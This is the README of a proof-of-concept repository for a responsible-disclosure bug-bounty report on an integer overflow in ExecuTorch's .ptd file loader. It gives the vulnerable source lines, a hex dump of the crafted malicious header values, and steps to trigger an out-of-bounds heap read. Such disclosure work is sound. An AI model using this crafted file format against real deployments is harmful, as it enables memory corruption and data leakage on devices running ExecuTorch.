Hugging Face's logo

kais113
/
executorch-ptd-overflow-poc

ExecuTorch
security-research
bug-bounty
huntr
Model card Files
xet
 Community
executorch-ptd-overflow-poc / README.md
kais113's picture
kais113
Initial PoC -- ExecuTorch .ptd integer overflow (huntr filing)
f3253b3 verified
preview code
|
Raw
History Blame Contribute Delete
4.22 kB
---
license: mit
tags:
 - security-research
 - bug-bounty
 - huntr
 - executorch
---
# SECURITY RESEARCH POC -- ExecuTorch `.ptd` integer overflow
This repository contains a **proof-of-concept malicious `.ptd` payload** for a responsible-disclosure bug bounty submission filed at [huntr.com](https://huntr.com) under the Model File Formats program.
**The PoC demonstrates an integer-overflow primitive** in `FlatTensorDataMap::load()`:
- `extension/flat_tensor/flat_tensor_data_map.cpp:224` -- unchecked `u64 + u64 -> size_t` truncation on attacker-controlled header fields
- `extension/flat_tensor/flat_tensor_data_map.cpp:236` -- same primitive used as the LOAD LENGTH, never bounds-checked
- Sibling code in `runtime/executor/program.cpp:104-109` uses `c10::add_overflows` correctly -- proof the project knows the right pattern and **missed copies** in the extension
PR #19057 ("Fix overflows in et", Apr 24 2026, commit ec5e8e4) hardened the `get_named_data` path of the same file but did NOT touch lines 224/236. Static missed-copy with confirmed-attention bug-surface anchor.
## Files
| File | Purpose |
|---|---|
| `malicious.ptd` | 256-byte byte-exact PoC. Two header fields are crafted to wrap on `u64 + u64 -> size_t`. Inspect with `xxd malicious.ptd`. |
| `craft_malicious_ptd.py` | Static crafter -- reproduces `malicious.ptd` from scratch. No ExecuTorch build needed. |
| `verify_unpatched.py` | One-command reviewer-side verifier. Fetches the live `extension/flat_tensor/flat_tensor_data_map.cpp` from `pytorch/executorch` main HEAD and confirms 7 unguarded `u64+u64` sites still present alongside 1 correctly-guarded `c10::add_overflows`. Runs in <5 seconds. |
## Verification (no ExecuTorch build required)
```bash
pip install urllib3
python verify_unpatched.py
```
Expected output (verbatim):
```
[BUG CONFIRMED] The file uses c10::add_overflows correctly elsewhere
 (1 call sites) but has 7 unguarded u64+u64 additions
 on attacker-controlled header fields. This is the
 missed-copy of the Aug 2025 CVE-2025-30402/30404/30405
 remediation pattern, in a code path that PR #19057
 (Apr 24 2026) added overflow guards to OTHER parts of.
```
Inspect the malicious file:
```bash
xxd malicious.ptd | head -5
```
Shows the wraparound-mate header values:
```
00000000: 0000 0000 0000 0000 4648 3031 2800 0000 ........FH01(...
00000010: 4000 0000 0000 0000 00ff ffff ffff ffff @...............
00000020: ffff ffff 0000 0000 4100 0000 0100 0000 ........A.......
```
(Note: bytes shown are little-endian; `flatbuffer_size = 0xFFFF_FFFF_FFFF_FF00` and `segment_data_size = 0x0000_0001_0000_0041`.)
## Runtime PoC (ExecuTorch build required)
To trigger the OOB read at runtime:
```bash
git clone https://github.com/pytorch/executorch.git
cd executorch && ./install_executorch.sh
# Build the runtime + ASan, then point any FlatTensorDataMap::load() consumer at this file.
```
Under ASan, the load produces a clean `heap-buffer-overflow` report. Without ASan, the result depends on the data loader:
- `BufferDataLoader` -> OOB read into adjacent heap allocations
- `MmapDataLoader` -> OOB read into adjacent VMA pages
On 32-bit ARM (ExecuTorch's primary deployment target -- mobile / embedded / Cortex-M), `size_t` is 32-bit and both header arithmetic sites overflow silently -- direct heap-corruption-grade primitive.
## Affected component
- **ExecuTorch** (`pytorch/executorch`) -- current `main` HEAD, post-commit `1c9c115`. Pre-patch.
- **File**: `extension/flat_tensor/flat_tensor_data_map.cpp` lines 224 and 236.
- **Same bug class also unhardened**: `runtime/executor/pte_data_map.cpp:57-60` (out of scope for this report).
## Disclosure status
This PoC is part of a responsible-disclosure submission filed via huntr's Model File Formats bug bounty program. After triage and remediation, this repository will be marked private or deleted.
## Disclaimer
This repository is intended for security research and responsible disclosure only. Do not use the techniques shown here on systems you do not own or have permission to test.
## Contact
Security researcher: **kais113** (amakais.sales@gmail.com)